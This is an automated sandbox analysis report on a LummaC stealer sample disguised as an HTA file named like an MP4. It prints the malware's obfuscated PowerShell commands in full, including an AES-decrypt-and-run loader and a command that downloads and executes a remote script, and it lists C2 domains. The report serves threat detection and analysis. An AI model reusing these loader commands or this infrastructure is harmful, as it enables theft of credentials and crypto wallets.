Edit tour

Windows Analysis Report
Poket.mp4.hta

Overview

General Information

Sample name:	Poket.mp4.hta
Analysis ID:	1582671
MD5:	9fb3db7b334f385701b3c88d63b7e5ee
SHA1:	d901cd79292cf0f31db2f1c83a62460e1f6a1ef5
SHA256:	658d84007977b9bcbac196d09ec012e15dba6d71f026613bb08e3a0ec4aceef8
Tags:	EmmenhtalFakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

Yara detected MSILLoadEncryptedAssembly

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6748 cmdline: mshta.exe "C:\Users\user\Desktop\Poket.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 4108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA9B10D7039997896CBC84E96ED894759B7F6EC303D431A1C284E80B0F41DD7B7095C39DFA3FFA3C5DAC6503E4E7D2A9357E4D1035C7529DAF56510661E0073D0774CC37C6D50823062C71BD864FA83B7C62B39136EF3D2B925C41C459527BD11BD88B2C0EFB234AF3A9BEC1D80B39780B48025DFF5F6C178B93DDF712850D1DF01DDF854BCDC17A251FF77FCE0C9538100E20B760941EB486C522975B34051141DC18EF0568AFA1572E0FA83A5BC2690D31086904583C27EE9C817B126F2253CF3CCD1704914D8640C18CA31D535669F9FD6A603DD53F72A57B9CD5430327727286E7BAAD13A6FFC39662E283A7FF978BFBF5FC5CC5AD1B6532DAD68D41E04F618D40AF75F747B2981066564E6D25416F3791017B463E698B280398C63BC8933C29AF09616A94C3BEA7D4DB384704BEC738B9921BF8898C01D30527E0AC949344494C49B43088E1CCC8686C23391F17452B02D5B81B43B2D2C06B9F16A23E9E9D87814CE2370D93C6FA82BA38C67929FD4899A473FE61DC37CA5A87F2EF8787A58DFA80CAB07CA991B121E35B8C81230AE958AE8E041C71E8D01DDBA8E8B5FC137E517D861E573DDF771C76B9FF74293555133275E31FC6A9DD69E2383D6D68BA4A50C71EB2A01AC0D83ED9D780D8E2C705249A5FB8BFE6075BF00425C865366BF8B7520989948982EC086CB930C60BFD2A43919A6D60A56DB6D5147D44BDA26305E434FBAEB0372ECFF4AF87A4D8C4C335E58BEF871285E7EB21F6E254351190F01B546758AEB96D90EAC30AE12B03A24FC2F97D3E421D8714C4CBAC8A57055D7B008B6C2BAF399731AA3200F812001847FB33B62F48E736887780A85C4673F47E7ED462E33E1548C32D0267151021174D334A2D5A504C69A4558F49E6F1B0219CB89D4B6D3773C0D9D1AD71754E9FF3938CBBCBFFEDDE23BA04DCE969E1D8B3904AFA17A972C310F35BCF0D222510068B1DCA603907C82B4E210FDBC369FFFC25846BB4F20E2859617B32043C903816DE80A42B6E9E87F83C3747BFD728BBC1280E82110C8C4979D26AB88E59076F703E098EF3965B72D2B9804D2E94D41B50BC31EF628704BFC95A21A38302980725E11668416D8B1446E5D0C6855E9EA62636E456872FA1A80C8E4410D6871AF6AE9E0E601497E4F1A7F61DC6F43E939B216392102D05EE16C0164C7B92D9CC1CCC6D70E28514EE6924ECEAD49A161ABD47DF4A06F7ED617E02E525D5118BC8244B9298001EAA02AA3874785A6BFCDF3F8DF9DF76F9DBC541CF7B1A069EEB3CB9550D16');$IoNU=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((FRsZn('444C5A775845534878786D7A6C446679')),[byte[]]::new(16)).TransformFinalBlock($VUQBu,0,$VUQBu.Length)); & $IoNU.Substring(0,3) $IoNU.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6272 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5956 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wholersorie.shop", "noisycuttej.shop", "imbibelubmbe.click", "tirepublicerj.shop", "abruptyopsn.shop", "framekgirus.shop", "cloudewahsj.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "jMw1IE--SHELLS"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2542046628.00000000069E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 4108	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1d14fa:$b1: ::WriteAllBytes( 0x1d20a1:$b1: ::WriteAllBytes( 0x15576:$s1: -join 0x1fad5:$s1: -join 0x36c32:$s1: -join 0x42d6f:$s1: -join 0x4fe44:$s1: -join 0x53216:$s1: -join 0x538c8:$s1: -join 0x553b9:$s1: -join 0x575bf:$s1: -join 0x57de6:$s1: -join 0x58656:$s1: -join 0x58d91:$s1: -join 0x58dc3:$s1: -join 0x58e0b:$s1: -join 0x58e2a:$s1: -join 0x5967a:$s1: -join 0x597f6:$s1: -join 0x5986e:$s1: -join 0x59901:$s1: -join
Process Memory Space: powershell.exe PID: 6272	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
Process Memory Space: powershell.exe PID: 6272	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x286280:$b2: ::FromBase64String( 0xa74048:$b2: ::FromBase64String( 0x2860f8:$s1: -join 0x911496:$s1: -join 0x91e56b:$s1: -join 0x92193d:$s1: -join 0x921fef:$s1: -join 0x923ae0:$s1: -join 0x925ce6:$s1: -join 0x92650d:$s1: -join 0x926d7d:$s1: -join 0x9274b8:$s1: -join 0x9274ea:$s1: -join 0x927532:$s1: -join 0x927551:$s1: -join 0x927da1:$s1: -join 0x927f1d:$s1: -join 0x927f95:$s1: -join 0x928028:$s1: -join 0x92828e:$s1: -join 0x92a424:$s1: -join
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.powershell.exe.69e0000.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BD

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = 